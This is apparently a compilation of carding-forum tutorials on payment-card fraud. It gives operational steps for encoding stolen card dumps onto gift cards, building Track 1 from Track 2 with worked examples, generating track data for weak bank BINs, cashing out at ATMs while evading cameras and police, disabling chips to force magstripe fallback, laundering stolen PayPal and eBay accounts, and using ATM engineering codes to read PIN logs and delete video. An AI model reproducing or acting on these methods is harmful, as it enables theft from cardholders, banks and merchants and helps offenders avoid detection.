+| 1999 | 6 digits + acn | ITT | 800/275-0100 for account |
+[-------------------------------------------------------------------------]
+*** also worth noting here is that AT&T has a rather interesting 950 number.
+It is 950-1288 (1ATT)! It is a carrier (modem) and runs up to 9600 baud, and
+is 8N1. Try it out- it ain't easy neither!...e
+Dumps Tutorial :#3
+Digit 1 (most significant): Interchange and technology:
+*
+0: Reserved for future use by ISO.
+1: Available for international interchange.
+2: Available for international interchange and with integrated circuit,
+which should be used for the financial transaction when feasible.
+3: Reserved for future use by ISO.
+4: Reserved for future use by ISO.
+5: Available for national interchange only, except under bilateral
+agreement.
+6: Available for national interchange only, except under bilateral
+agreement, and with integrated circuit, which should be used for the
+financial transaction when feasible.
+7: Not available for general interchange, except under bilateral agreement.
+8: Reserved for future use by ISO.
+9: Test.
+*
+Digit 2: Authorization processing:
+*
+
+0: Transactions are authorized following the normal rules.
+1: Reserved for future use by ISO.
+2: Transactions are authorized by issuer and should be online.
+3: Reserved for future use by ISO.
+4: Transactions are authorized by issuer and should be online, except under
+bilateral agreement.
+5: Reserved for future use by ISO.
+6: Reserved for future use by ISO.
+7: Reserved for future use by ISO.
+8: Reserved for future use by ISO.
+9: Reserved for future use by ISO.
+*
+Digit 3 (least significant): Range of services and PIN requirements:
+*
+0: No restrictions and PIN required.
+1: No restrictions.
+2: Goods and services only (no cash).
+3: ATM only and PIN required.
+4: Cash only.
+5: Goods and services only (no cash) and PIN required.
+6: No restrictions and require PIN when feasible.
+7: Goods and services only (no cash) and require PIN when feasible.
+8: Reserved for future use by ISO.
+9: Reserved for future use by ISO.
+Check this it out... i hope you will understand how to check it.
+Example... to check 101
+101 =
+1: Available for international interchange.
+0: Transactions are authorized following the normal rules.
+1: No restrictions.
+Thats the meaning of 101 and how it will be authorized.
+Dumps Tutorial :#4
+What do I need for real carding?
+This is a very good question you will need some cash. And the following will be helpful but not required
+at first. You should get these items at some point, but you don't need them right away. And I will tell you
+why in next section.
+Computer-laptop is best, as you can carry it with you on your op?s if you desire. If you don't have a
+laptop you can use your home P.C. till you can afford to get one. Of course with home PC you cant take it
+with you on your ops
+Encoder - If you look around most every has or talks about an MSR206 this seems to be the preferred
+encoder, but you can also use an AMC722. The AMC722 is usually cheaper and does the same thing.
+Look on the net and you can find these for pretty decent prices. There is a internet company that will ship
+overnight and you can send payment by Western Union. The have a special for $550.00 you get MSR206
+
++ Exeba Encoding Software + 50 loco or hico cards. Also XRAYSWIPE has pretty good deals on them
+also and is a reviewed vendor. You can use Exeba Comm software or TheJerm has a software program
+for the MSR206.
+Laptop Bag - You can put your laptop and encoder in this also. Nice to have if you want to take your
+laptop and encoder on op?s.
+Power Inverter - Needed to run your encoder and nice to have if out for long period of time and laptop is
+dying. You can get these just about anywhere even wallyworld.
+Novelty Id - This should be at the top of your list as one of the first thing?s you should get. You will need
+this at some point you do not want to use your real info. I repeat do not even for 1 time use your real
+information. There are some good vendors that are quick also. Just look under the reviewed vendor
+section for more details.
+Dumps - Get them from zeusk. You can get classic, gold, platinum, world, business, signature etc. If this
+is your first time you may want to get classic and start by shopping for low end items. IE anything under
+$200-$500. Now classics working not good and will go for 1 or 3 times that but the general rule of thumb
+is under $300 and you should be okay. Gold and Platinum for items above $500 but say to $1,000 and
+Business, Signature $1,000 and above. These are just suggestions and not hard rules.
+Track 1 and 2 or just Track2 - you can get from zeusk. If you just have track2 only you can generate track
+1 with PCKit-track1 generator. You will want to encode both tracks to your card. Making sure to change
+the name on the dump. Some stores only use track2 but it's best to stay safe and encode both.
+Dump Example
+Track1 B410000000000000000000^REGAN/RONALD^0409XXXXXXXXXXXXXXXXXX
+Track2 41000000000000000000=04091XXXXXXXXXXXXXXXXXXX
+You of course change the name on track1 to your Novelty last name and first name.
+Plastic cards to put dumps on: Okay again never use your own card to encode onto, just not the best idea.
+You can get cards from just about anywhere, some drugstores sell prepaid cc's, you can try that or get a
+Visa or MasterCard branded gift card. Most malls carry this type of GiftCard. Simon Cards have been
+used a lot in the past so I would suggest staying clear of those. The best way Buy from plastic vendor.
+Wallet-You will need extra wallet to store you novelty items. You don?t want to use your own wallet and
+keep having to take you real cards and id out and replacing them with your novelty.
+Anon Phone-Don't really need but if you have a phone merchant you can call from anon cell before going
+to use your card.
+You don't need everything I have but they all are helpful.
+Quick Start Up: Okay so you don?t have the time to wait to get all your tools or maybe your cash flow is
+not flowing. You may ponder how can I get up and going as quickly and cheaply as possible.
+Answer: You can buy dumps from reviewed vendor of course and buy plastic from plastic vendor. Most
+plastic vendors will encode your cards for you. This may be the cheapest way to go. Say you buy 5 dumps
+for $50.00 = $250.00 and 5 plastic for $75.00 =$375.00 total for both $625.00. Add a drop to that $50.00
+and for $675.00 you will be ready to go. Another advantage with going this route is you will have
+matching plastic. The plastic vendor will emboss your plastic with your novelty information. If you don?t
+have a lot of funds try taking a cash advance on your own card. You will be able to repay it rather
+quickly.
+
+Okay I finally got everything, I'm Ready to go Right?
+Answer: Okay hang on there Skippy, you may think you are ready but are you??
+Get into The Correct Frame Of Mind: Remember you are the Cardholder this is your card and you will
+treat it as such. Repeat 50 times then say back words 25 times, lol, Just kidding but you are who you say
+you are. This is your card don?t be scared this is your card. Who?s Your Card? Also a good idea to be
+aware of what your novelty id says. Know the address etc, this will help you feel more at ease and will
+help if cashier ask off the wall question. Be prepared go over in your mind how different scenes might
+play out and have good sensible answers.
+Remember the customer is always right, Never let them think you?re not legit even if they throw it in
+your face.
+Pick Your Poison! (Where should I shop)
+If you are a Newbie you should try stores with self swipe checkouts. Just beware some of the self swipes
+will verify your id. Also if you want to get your feet wet grocery stores with self swipe are real nice. They
+even have the ones that you ring up your own shit and pay without any cashier present.
+Gas Stations- I would suggest staying away from gas stations. Most have cameras and why risk someone
+getting your car info for such a small purchase. Plus some dumps will die quickly when using a Gas
+Station.
+Using Cards with non-matching last 4- Simple shop at stores that do not check last 4 or use AVS or type
+in CW2 I?m not going to post which stores do and do not at this time. If you don?t know any off hand go
+there in person and use your legit card and watch what they do.
+Cards with matching last 4- Shop anywhere that doesn?t have AVS or type in CW2 I will not list any
+stores you will have to do your own research.
+What is AVS?
+Address Verification System- verifies cardholders real addy, sometimes only uses zipcode.
+Security- This is a very important topic, and here are some tips. First never park in front of store in which
+you are shopping. If someone gets suspicious of you they may write down your license plate or if they
+have cameras outside they may catch it on there cameras. Always park far enough away that the store cant
+see which car you got into. If possible park around a corner or have someone else drive and wait out of
+site for you. If you are using the buddy system You can get some 2 way radios or both keep cell phone on
+you and if shit hits the fan you can sprint away and have the car meet you somewhere nearby. Never run
+directly toward your car if shit hits the fan and you have the run, then security is probably running after
+you. See planning for more information on this. Also you may want to carry a small can of mace or
+pepper spray key chain size etc. This can be used to get your freedom from security but may lead to more
+charges if your caught.
+Planning- Okay You are now just about ready to go.
+1. What area will I be shopping at and what stores- Best to know in advance you can make driving
+directions to the area and from store to store. This is nice and will sped up the time your in one area.
+Helps you find the quickest way to and from area also. You don?t have to go this route you can go what I
+would call this free styling.
+2. Once you spot your store find good parking spot away from camera out of view from store. Look
+around what will you do if shit goes wrong. A good rule of thumb is never run directly toward your car.
+
+You can park around the corner in next parking lot over. If shit hits fan you can exit store go in opposite
+direction and loop around behind the store to your car. Unless your 500 pounds and cant run in which if
+you try this method you may bet caught if you have to run.
+3. Bring other Shirts with you. This is nice, you can change your shit when shopping at different stores
+this will help you keep much safer. And if your being chased you can take one off and have the other one
+underneath.
+4. Most of the time you wont have any problems and you may tire of parking so far away, you tell
+yourself I?ve done this 100 times and no problems. But never let your guard or security down. This is
+what keeps you safe plus it?s good to walk a bit for heath reasons.
+5. Keep them guessing, some people wear hats and sunglasses. My advice don?t wear sunglasses inside it
+only makes you look shady. A easy way to change your appearance is to use real glasses. If you don?t
+wear glasses use Stage glasses these look like regular lenses but are clear with no prescription. If you
+already wear glasses try different frames or use contact lenses. Also you can change your facial hair, grow
+a mustache or a goatee or beard. Then shave it off after sometime and go bareback etc. These are ideas to
+change your appearence.
+6. Dress the part, dress to fit in, you don?t want people to remember you.
+7. Always shop a good distance from where you live. You don?t want them to catch you on camera and
+put a picture of you on the news for your family or friends to see. Also you don?t want to go back to the
+same stores using your legit information. It?s unlikely they will catch you but you can never be too safe.
+Okay I?m ready
+Okay you have your cards and dumps, you planned your op out and you have got your mind ready to go
+what?s next?
+Shopping- Yeah let?s go, Remember this is your card. Be confident and act normal. Pick out your product
+proceed to cashier and check out. Choosing your cashier is vital and you will get rather good with this as
+you go from what I have heard. Usually younger females are the best. You want them to process you like
+everyone else. Make them feel they have no reason to ask for more information like id etc. If they ask for
+id show them , keep in your wallet and just hold it for the can see,
+If they ask to see your card to compare signatures let them do it but keep you hand held out till they give
+it back. Start small and grow slowly , take time to learn the ropes and it will pay off for you big time.
+Also if you card is declined it?s a good idea to carry a backup with you. You can tell them you might
+have overdrawn your account or limit and tell them you will try another card. If your 2nd card is declined
+or you don?t have one. Tell them you will go to bank or go get your checkbook etc. If for some reason
+you get a pick up card tell them you wife or girlfriend lost her card and reported her?s lost and you forgot.
+99% of the time they will say okay. You can then try another card or tell them you will be back with
+checkbook.
+Call for authorization- if this happens tell them you in a hurry and don?t have the time to deal with that or
+tell them your card must be over the limit and you don?t want to purchase the item now. Act as a
+cardholder would act embarrassed. Whatever you do don?t go through with the call especially if they
+have your card in there hand.
+What to stay away from- If you are new don?t try carding a laptop right away. Start small , I would
+suggest staying away from high fraud items IE laptops and electronics. Also stay away from high security
+stores i.e. BB and CC. And stay away from malls they have more security then you need to deal with in
+the beginning.
+I will try and update this from time to time, feel free to give your input. Thanks and good luck!
+
+Dump Tutorial :#5
+The following article explains practically how vulnerable banks are in the operation of ATM cards. ATM
+cards (Credit cards) usually has a magnetic stripe that contains the raw data called tracks for its operation.
+The physical layout of the cards is standard. The LOGICAL makeup varies from institution to institution.
+There are some generally followed layouts, but not mandatory.
+There are actually up to three tracks on a card.
+Track 1 was designed for airline use. It contains your name and usually your account number. This is the
+track that is used when the ATM greets you by name. There are some glitches in how things are ordered
+so occasionally you do get "Greetings Bill Smith Dr." but such is life. This track is also used with the new
+airline auto check in (PSA, American, etc)
+Track 3 is the "OFF-LINE" ATM track. It contains security information as your daily limit, limit left, last
+access, account number, and expiration date. (And usually anything I describe in track 2). The ATM itself
+could have the ability to rewrite this track to update information.
+Track 2 is the main operational track for online use. The first thing on track to is the PRIMARY
+ACCOUNT NUMBER (PAN). This is pretty standard for all cards, though no guarantee.
+Example of Track1
+B4888603170607238^Head/Potato^050510100000000001203191805191000000
+Example of Track2
+4888603170607238=05051011203191805191
+Usually only track1 and track2 are needed to exploit the ATM card.
+Let us examine track1.
+Take the Credit Card account number from Track 2 in this example it
+is:4888603170607238 and add the letter "B" in the front of the number like
+this B4888603170607238 then add the cardholder name YOU want to show on the
+card B4888603170607238^Head/Potato^(Last name first/First Name)next add the
+expiry date and service code (expiry date is YYMM in this case 0505,and in
+this case the 3 digit service code is 101 so add 0505101 ,
+B4888603170607238^Head/Potato^0505101
+No add 10 zero's after service code:
+B4888603170607238^Head/Potato^05051010000000000
+Next add the remaining numbers from Track2 (after the service code)
+B4888603170607238^Head/Potato^050510100000000001203191805191
+and then add six zero's (6) zero's
+B4888603170607238^Head/Potato^050510100000000001203191805191000000 this is
+your Track 1
+Track 1:B4888603170607238^Head/Potato^050510100000000001203191805191000000
+REMEMEBER THIS IS ONLY FOR VISA AND MASTER CARD(16digits) , AMEX HAS 14
+DIGITS, this doesn't work for Amex
+
+FORMAT FOR TRACK2
+CC NUMBER: YYMM (SERVICE CODE)(PVV)/(CVV)
+Here is the Fleet's credit track2 dump:
+4305500092327108=040110110000426
+we see card number, an expiration date, 1011 - service code, 0000 is the place for pvn (but it is absent!),
+and at least 426 is the cvv (do not mix with cvv2)
+Now let's take a look on MBNA's track2 dump:
+4264294318344118=04021010000044500000
+here we see the same - no pvn's and other verification information -just a cvv.
+As clearly shown above it is possible to generate track1 from track2 using the method shown above.
+However track2 gen software automates the process.
+The major process of getting the track2 info is through skimming. Fraudulent POS (Point of sale)
+merchants can use handheld devices called skimmers to read off and download the tracks data from your
+credit card if you are not careful. This is the main method of obtaining the original tracks from the credit
+card.
+However this article will focus on the exploitation of ATM cards using credit card info such as Credit
+card number, cvv2, Exp date and PIN and then using algorithms commonly called ALGOS to generate
+the track2. These credit cards infos are normally obtained by spamming. There are a lot of reviewed
+[censored] who sells these infos in some carding forums.
+Now it is interesting to note that there are a lot of talks about track2 generation possibility. How much is
+it real? However in my own candid opinion, it is very possible to generate track2. The simple truth is this.
+Generation process of debit (and some credit) dumps from the credit card number, expiration date and
+cvv2 code becomes possible because of the banks’ weak, "nonsaturated" structure and the banks failure to
+actually carry out proper validation of the track2 info. It might interest you to know that about 10% of
+banks are vulnerable. This vulnerability called pvv loophole have been fixed for the major banks But still
+sometimes the idiocy and negligence shown by employees of many American (and not only) banks quite
+often continues to surprise all: about 10% of issued cards still vulnerable, even for the moment.
+During the last 2 years I have come to discover so many banks which are still vulnerable to this attack.
+This forms the basis of this article. Armed with the right tool, you can actually encode cards using cc
+number, cvv2, Exp date, PIN and the algos.
+Now what is the nature of the algos you might ask? I will give you a sample.
+518445**********=YYMM10100000000779
+529107**********=YYMM10100000000CVV
+These are track2 info. The RHS is the card number. YYMM is the exp date
+( year/month) and the CVV is the card verification value. The first 6 digits of the card number is called
+the BIN . You only neeed to know if the BIN is casahble or vunerable to use the Algo.
+Below is the screenshot of the Algo list I have compiled and tested to work 100% ( About 800) .
+Because some banks fail to actually validate the full track2 info, it is possible to use track2 generators
+softwares to attack the BINS. You simply enter the credit card number, cvv2, exp date and you get the
+generated track2. Remember this only works for weak BINS or cashable BINS. To test if the track2 you
+have generated is working before practically going to the ATM with the PIN to cash out, it is important
+you check the track2 using online checker. This will save cost for your embossed cards and it will be
+safer for you. I can offer you this service at a modest price of $3 for one track2 info. If you get 00
+approval code and you have the right PIN , you will have about 97% success.
+
+Dumps Tutorial :#6
+Short tut, on how to make track one with track 2..
+couple days ago i was looking how to do this, found a way,and just want to post if it may help anyone..I
+know kreenjo offers a gen, but maybe you are not sure if he is keep logs on it....or maybe you just want to
+know if gens ever go down...
+Take example of last dump Track2 (this is a dump):
+Example dump info: 4888603170607238=05051011203191805191 PATACSIL/DAVID Bank
+of America, N.A. (USA) CREDIT PLATINUM United States of America
+4888603170607238=05051011203191805191 <----This is Track 2 (we want to make
+Track 1 out of Track 2
+Head/Potato <---the name of the card holder (LASTNAME/FIRSTNAME)
+Bank of America, N.A. <-- Bank Name
+(USA) <--- Country of Bank
+CREDIT <-- Credit or Debit ( in this case it is Credit)
+PLATINUM <--type of card, eg. Classice, Gold,Platinum
+United States of America <--Country
+When you see and equal sign (=) in a Track it always means it is Track 2
+When you see the letter (cool.gif in front of the Track it is always Track 1
+Now to Make a Track 1 From Track 2 see instructions below (there are online
+web sites that do this but it's good to know the basics of doing it , just
+in case you can't get to an online web connection)
+Take the Credit Card account number from Track 2 in this example it
+is:4888603170607238 and add the letter "B" in the front of the number like
+this B4888603170607238 then add the cardholder name YOU want to show on the
+card B4888603170607238^Head/Potato^(Last name first/First Name)next add the
+expiry date and service code (expiry date is YYMM in this case 0505,and in
+this case the 3 digit service code is 101 so add 0505101 ,
+B4888603170607238^Head/Potato^0505101
+No add 10 zero's after service code:
+B4888603170607238^Head/Potato^05051010000000000
+Next add the remaning numbers from Track2 (after the service code)
+B4888603170607238^Head/Potato^050510100000000001203191805191
+
+and then add six zero's (6) zero's
+B4888603170607238^Head/Potato^050510100000000001203191805191000000 this is
+your Track 1
+Track 1:B4888603170607238^Head/Potato^050510100000000001203191805191000000
+REMEMEBER THIS IS ONLY FOR VISA AND MASTER CARD(16digits) , AMEX HAS 15
+DIGITS, this doesn't work for Amex
+Dumps Tutorial :#7
+It applies mostly to the US, but others can pick up some tips too.
+How to cash out Dump + PIN and sleep peacefully at night, what is there to fear? And the most
+importantly – how are they trying to find us?
+I’m sure everyone has their own methods and approaches, so we will not state that we are smarter then
+anyone else. We will simply tell about our approaches and applied tactics then everyone will make their
+own conclusions. I will only say that observing our rules and approaches, through the past 3 years, not
+one of our fighters has been caught.
+1. The fastest and most productive way. We use it only for large amounts of a material, but unfortunately
+for the majority this is out of reach as it requires big capital investment. Not everyone can use this
+method, but for the general picture we have decided to share it.
+Group or one person working on motorcycles.
+Amounts that we did in half a day using motorcycles was 10 times greater than what the same group can
+execute in 3 days using cars. The point is that we can drive up to the ATM without even getting off the
+bikes. Black bike, black helmet - there are thousands of those in the city. Of course the bikes are without
+license plates and exclude any unique features.
+For example ... All of our bikes have a toggle-switch for turning off the back light. In case if anyone
+follows you at night, you can become invisible almost momentarily. To give you an idea of what we do
+during daytime - we use 2 groups on 3 bikes each. Only 2 bikes are cashing and the third one just rides
+around. In case of danger during the routes – if COPS want to pull over one of the 2 bikes, 3rd bike will
+speed up or do some sharp movements (as it seems to COPS). Of course COPS will focus all of their
+attention on the escaping bike leaving alone the other two (filled with money and cards). So far COPS had
+no luck catching the escaping bike ) we use "turbo charged HAYABUSA" motorcycles, but even if they
+do catch up ... maximum they can give a speeding ticket, because that driver has nothing on him. We
+always leave a car near to the place of work. It is very convenient – just stop by for a few minutes every
+so often to drop off the money and empty cards.
+This method is very effective but only for large cities, besides not everyone can drive a motorcycle and I
+am not even talking about their price.
+
+2. Using a PICK UP TRUCK. All charm of this method is that it enables to hide the license plates easily
+and the most importantly - legally. Trucks overflow US roads, as they are very common and easily
+accessible. They do not attract much attention and can be easily lost in sight. Alright ... Everyone knows
+that in the US driving a car without front license plates is not a huge offence and COPS usually do not
+pay attention to that. But we still have the back license plate!? We pull down the trunk door and drive the
+car with an open trunk ... In this case the license plate is only visible to other drivers but absolutely not
+visible to cameras located on buildings. This allows parking near the ATM and accelerates your work.
+Plastic.
+Never use plain/ white plastic. It is not safe for many reasons. Someone can notice it and understand
+what’s going on. If cops will find it – they will know what it’s used for right away. And most
+importantly ... if such card is retained by the ATM and in the evening when workers take it out – they will
+understand what it is, they can make a police report and give it for examination which would reveal your
+finger prints. Just go to any grocery store and pick up some GIFT CARDS for example VISA or MC.
+These cards don’t draw attention of any passer-bys; if COPS will find them, they will see them for what
+they are – gift cards, and the most importantly ... When workers will take it out from the ATM (if the card
+was retained), at least 10 people will touch the card – holding it in their hands and trying to figure out
+what moron wanted to take out CASH from a GIFT CARDS. At least this card will not go straight into a
+plastic bag for examination.
+NEVER WRITE ON THE CARD!!!! Lately COPS are instructed on different signs to pay attention to in
+case of credit card detection. And so believe me... they examine each card at least for good 5 minutes.
+And God forbid a PIN is written on it. Use labels or mark the cards and keep the PINs separately.
+ATM!!!
+There are about 10 different kinds. Study them before beginning your work. If you see a small mirror -
+90% chance that there is a CAMERA behind it. You see the black plastic square built into the panel by
+the pin pad or located by the monitor - 100% it’s a camera. You can’t hide from it but you can easily
+cover it with a sticker or something else. Cameras do not record all the time ... They start only after you
+have inserted the card in the ATM. Also, they shoot 15 frames per second - not 24 ... meaning that at
+reproduction the image recorded by the camera will be time-lapsed. And even if your face has got into the
+shot – don’t worry. It is impossible to find someone by the picture. ATM camera in mainly used for:
+when the card holder calls to the bank claiming stolen money - bank does an investigation and looks at
+the recordings from the camera. In 50% of the cases stupid Americans take their money themselves and
+then declare that someone has stolen it. Then bank tells the Americans about the cameras in the ATMs,
+and that the cardholder took out the money himself; and if they continue doing this - they can end up in
+prison. Therefore no one will search for the face in the camera shot. However if your license plates will
+get in the shot - that’s a different story.
+Storage of cards!!!
+Never keep all of the cards in your pocket. Hide them all in the car and take with you only the ones you
+will be using. By the law US COPS can search you in the street or for any small traffic violation.
+However, they cannot search your car. In other words ... for example they stopped you and searched you,
+if they have not found anything in your pockets - they will ask you to search your car. You can safely say
+NO!!! If you don’t have any pending warrants and nothing in your pockets – they would need a warrant
+to search your car. And they cannot get a warrant without a valid reason!!! We had a case when we were
+
+searched and asked to search the car ... We refused! After which the obnoxious COP said: we will now
+request a search warrant from the police department and will search your car. We nodded our heads and
+politely asked to sit in the car. In 20 minutes the COP told us that he is dispatched to an urgent call, threw
+our documents in our car and left. Clearly, no one can give him a search warrant without a legitimate
+reason. Before starting your work – get very familiar with the local laws.
+Try to keep all of the cards hidden and the less possible on hands. However, if you are getting pulled over
+by COPS and you have a small amount of cards on hands - the best way is to dump them into the car
+door. When the window is open, there is a crack between the glass and the metal. Dumping the cards
+there - they fall directly inside the door. To get them the door would need to be disassembled and no one
+(COPS) would do that without a reason.
+Communication facility!!!
+Never keep your personal cell phone with you, as it is constantly registers by the operator – tracking your
+movement. For communication use only new phones activated specially for work and do not call
+anywhere besides another phone with the same purpose. Another example … for example your mobile
+phone works only with one operator (as previously iPhone) and approaching the ATM you are holding it
+in hands. Believe me, those looking for you can request the phone operator for all phone numbers which
+were registered in this region at that time ... Certainly the list will be long, but on the next report which
+they will request on another location (where you cashed out another ATM) same phone number will be
+precisely visible - the phone number which was in both places during required time....
+Work in different city/ state.
+Always remember that any card will work better at home. I am not even talking about REGION
+BLOCKS which is a big deal. And so … If the card is from one state and you start cashing it in another –
+the protection on UNUSUAL ACTIVITY works instantly and the bank will most likely call the
+cardholder. If the card is cashed in the same state - it will work much longer. It is already proven by us.
+So if you have a large amount of material from one place – think about it, maybe it’s worth going there.
+Another very important detail. When the cardholder calls his bank claiming someone stole his money -
+bank automatically sees the cardholder as suspected #1. Because the bank doesn’t understand how and
+who can know the PIN code, that is known only to the owner. Maybe the bank understands, but it is
+easier to politely refuse giving a refund to the card holder due to lack of the INFORMATION
+CONFIRMING INNOCENCE of the OWNER. Sounds ridiculous, but it so ... the cardholder has to
+convince the bank of his innocence. That’s why ... If you cash the card in other state - it will be easier for
+owner to prove that it wasn’t him. If the bank knows that the owner is not guilty – they will start
+searching for the one who is. Well and if you bombed a card in a place of its residence – it will be hard
+prove cardholder’s innocence and accordingly nobody will search for you … and if they will – it won’t be
+soon.
+I think everyone knows how to find out where the card is from.
+Overlook your surroundings.
+We always take a couple of days to examine local surroundings before starting work. During these couple
+of days we map out good/ rich and bad areas. We plan routes in advance: observe what time and how
+many COPS patrolling the area, also looking at the arrangement of banks and stand-alone ATMs. We find
+out where the bars and night clubs are located … In the evening there are many people – that is what we
+
+need. If you work at night we do not recommend using ATMs located in non-crowded places. Always
+remember that a patrol car can show up anytime and if you the only alive person in their sight – you will
+catch their attention. I recommend going to STRIP CLUBS ... you can look at the girls and the ATMs are
+good there. The limit on withdrawal is higher than in bank ATMs and anybody will pay attention if you
+take money from 4-5 cards. That is a normal phenomenon there.
+Dumps Tutorial :#8
+Today we discuss a little about 201 dumps - a lot of peoples just running away once they seeing terrible
+number 201. Feel easy - things not so terrible.
+First of all i would like to say that write 201 dumps on the chip it is not a fantastic, but is real things, and
+actually not so hard to do. But i want to discuss another thing - i would like to give you a hint how to use
+201 dumps everywhere - even in such places where pos terminal requires chip...
+Lets begin...
+First thing we should have is a card with chip and magnetic stripe.Then we have to look pretty in the
+home for 12V AC adapter. Found. Good. Now all we have to do is to scratch a little chip metal contacts
+with + and - of the adapter. Seeing nice sparks - sign of good work ;-) After this little surgeon chip is not
+working anymore and this is extractly what we need. Now we have to encode 201 track to the regular
+magnetic stripe of the card and safely go to shop... Once the seller trying to insert the card with the chip
+he/she gets a nice error (additinally you can give him a reason that you washed your wallet with the card
+and chip is not working), and now most interesting part - once the terminal detects that chip is not
+fucntioning it switches back to magnetic stripe mode and allows you to swipe the card, all you have to do
+is to persuade the cashier to do it.
+Ebay + Paypal Cash out
+Hey, today I would like to teach you a simple but effective method.
+In this method, you need two PayPal accounts and two eBay accounts.
+Step one: You buy a PayPal and an eBay account off someone. The PayPal should be verified and linked
+with a CC. The CC needs to have a high limit.
+Step two: Sign in to your personal eBay account and list a product that costs like 300$-4000$.
+Step three: Sign in with the stolen eBay account and buy the product with the stolen PayPal that you
+listed. Verify the transaction with the stolen eBay account, and feedback to your real eBay account.
+Step four: Take the money to your eBay account and spend it to whatever you like. The person will not be
+able to charge-back because you accepted the payment with the stolen eBay account.
+That's all it takes to do this guys!
+Happy carding!
+
+• Hey, today I would like to teach you a simple but effective method .
+In this method, you need two PayPal accounts and two eBay accounts.
+Step one: You buy a PayPal and an eBay account off someone. The PayPal should be verified and
+linked with a CC. The CC needs to have a high limit.
+Step two: Sign in to your personal eBay account and list a product that costs like 300$-4000$.
+Step three: Sign in with the stolen eBay account and buy the product with the stolen PayPal that
+you listed. Verify the transaction with the stolen eBay account, and feedback to your real eBay
+account.
+Step four: Take the money to your eBay account and spend it to whatever you like. The person
+will not be able to charge-back because you accepted the payment with the stolen eBay account.
+That's all it takes to do this guys!
+Happy carding![/quote
+More explanations needed
+***Withdraw / Cashout from Limited Paypal ***
+Do you have Paypal account with a positive balance and need to Cashout stucked Fund?
+Do u have Paypal Account with Limited Access ???
+Is it over 180 days old?
+Did u recive the email to withdraw funds?
+Do u have more than 100$ in your account?
+If all "YES" send me a message from contact us or knock on live chat , i can cash out from your forgoten
+paypal account
+How will i pay - PayPal,Neteller , VCC , LR ( For LR ,Additional exchange fee applies )
+How long will it take? - 3 - 5 Days
+How much i charge?
+Fees:
+50 - 100 - 60%
+101 - 500 - 55%
+500+ - 50%
+Note
+
+1. 180 days older paypal
+2. Don't ask me to pay first
+3. Sometimes the process fails due to paypals failed transfer, if such case we are not responsible.
+4. Don't ask to cashout hacked account, I will block your contact
+Details -
+The account must have a positive balance , prefferably 100+
+Please note, if the account is limited, 180 days (6 months) must have passed since the limitation.
+Sometimes this only takes 45 days, message me for details.
+You will receive the remaining balance, as soon as the funds clear.
+I will follow up with messages at least once a day.
+You will get and payments as quickly as possible.
+This service is available for every country in the world.
+This is a one time deal, if you need ongoing withdrawals, please message me.
+I will not give you cash up front. Don't ask.
+If you need a different form of payment, just ask.
+Accounts must be yours, I will not cashout hacked/stolen accounts.
+Please message me to get started!
+To attend live chat or see further details , visit:
+verifypp .com
+Or Add me in skype : Miskat.thamid.aziz
+Ebay Tutorial
+This article is mainly for beginners who still don’t know how to begin.
+So first you should do – learn language you’re going to communicate with customers well. If you can’t –
+forget about auctions. Selling – it’s communication firstly. And you won’t be able to sell anything
+without communication.
+So you’re newbie, don’t have experience, money. Too bad. Anyway if you don’t have knowing friend
+you need some money to but accounts, cvv’s, socks.
+I’d like also to add a few words about technical aspects of working with eBay. For successful work will
+be enough if you’ll have IP address of country you work with, it’s not obligatory to be the same as
+holder’s city. Also eBay doesn’t check system language, time. I recommend you to make not the GMT -8
+time as it has main eBay office. It’s also possible to use yahoo mail server.
+Seller’s account registration.
+Besides common data you’ll be asked to enter Primary telephone, Secondary telephone, Date of Birth.
+You should enter the number which doesn’t belong to holder but belongs to the same geographical
+position. It’s not recommended to use “always-busy” numbers – eBay has a database of such numbers and
+
+you’ll be asked to verify your number. The same about toll-phre and cell phones (but not always). If you
+have an account with enough amount of feeds, it’s worth to order a phone number in USA and use it also
+for communication with buyers – and it could be a point of successful deal. You can use it and for
+unlocking of your account if it will be temporary blocked.
+After you’ll confirm your registration by clicking the link in the letter – you’ll receive fnctional buyer’s
+acc with 0 feedbacks. Next press “sell” button to register as a seller. You’ll be asked to enter holder’s and
+his card’s data. Also you will have to enter the data of holder’s checking account (bank name, routing,
+and account’s number). Of course we don’t have holder’s bank account. And we don’t need it. It’s
+enough to find bank name by BIN look up and find routing number of this bank. Further you can enter
+random number. But if you’ll enter bank account which was already registered before – be ready that
+your fresh account will be locked on the next day.
+Lots posting and selling process.
+With fresh accounts you can:
+1. Post lots with cheap stuff;
+2. Promote them a little and post more expensive stuff.
+It’s better to do lots posting from 5AM to 9 PM PDT as in another time all law-following civilians are
+sleeping. The same about time of contact with buyers (phone and email). Sellers themselves recommend
+to post lots from 5 PM to 7 PM (PDT) as buyers activity is the best at this moment.
+Accounts promotion.
+For accounts promotion you’ll need a little imagination and patiens,
+Remember that first 30 days after registration you’ll have “beginner-mark” near your user ID. Such
+accounts almost useless for work as it attracts buyers’ suspicions. So this time you can promote it or just
+forget about it or a month.
+Firstly on most of new accounts new cheap stuff is posting, better “was in use”. Further you buy it from
+your buyer’s accounts and receive some positive feedbacks. It’s enouth 1-3 such feeds to be possible to
+post more expencive stuff.
+In case if your lot will be won by real buyer you should work a little more to get rid of him. Of course
+you can change registration data and try to take some money from him – but trust me, It’s not good idea.
+Also posting s lot of lots at once to speed the promotion is not a good idea, It will have success in case of
+not popular and cheap stuff, but anyway buyers first look at the last feedbacks and lors which was bought
+for them.
+Selling from fresh accounts.
+Before you’re going to sell something, you should find the drop or yourself who will accept payments
+from buyers on his name and address. That’s why before lot posting you should change the info about
+account’s holder with telephone or without. After this you can post a lot.
+
+Engineering codes of ATMs
+Engineering codes of ATMs
+The engineering codes of ATMs
+The engineering codes are used to operetivnogo repair and adjustment of ATMs.
+For the most part and are used in old and new ATMs Japanese (brand not specified), the difference is only
+the immediate combination of signs
+inzh.koda.
+What can I do with inzh.koda with the ATM. Opportunities well finite but quite large.
+Inzh.kodami you can:
+1. View and delete video recording service ATMs.
+2. Prosmoret amount and the Number of banknotes in the cells.
+3. Log of the operations and their keyboard kits
+4. Technical settings, network settings and connections for ATM connected to the Internet or LAN.
+There are three types of ATMs using inzh.kody.
+Type 1 - the engineering uses a special card and pincode.
+TYPE2 - Using flash keys, or e-i-key.
+TYPE3 - uses direct keyboard teh.dostup.
+Codes for ATMs third type:
+Hold the press 071ili # 077. There is an inscription "Pin enter", the default 9999.
+Next appears "Serva enter".
+Type:
+0012 * - Indicates the log operetsy.
+It looks like this:
+1SLR # 123456789012341234567890 ....#
+2SLR # 123456789012341234567890 ....#
+3SLR # 123456789012341234567890 ....#
+and so on ...
+The first 10 digit code operation, the following 4 numbers - PIN card on account number to withdraw an
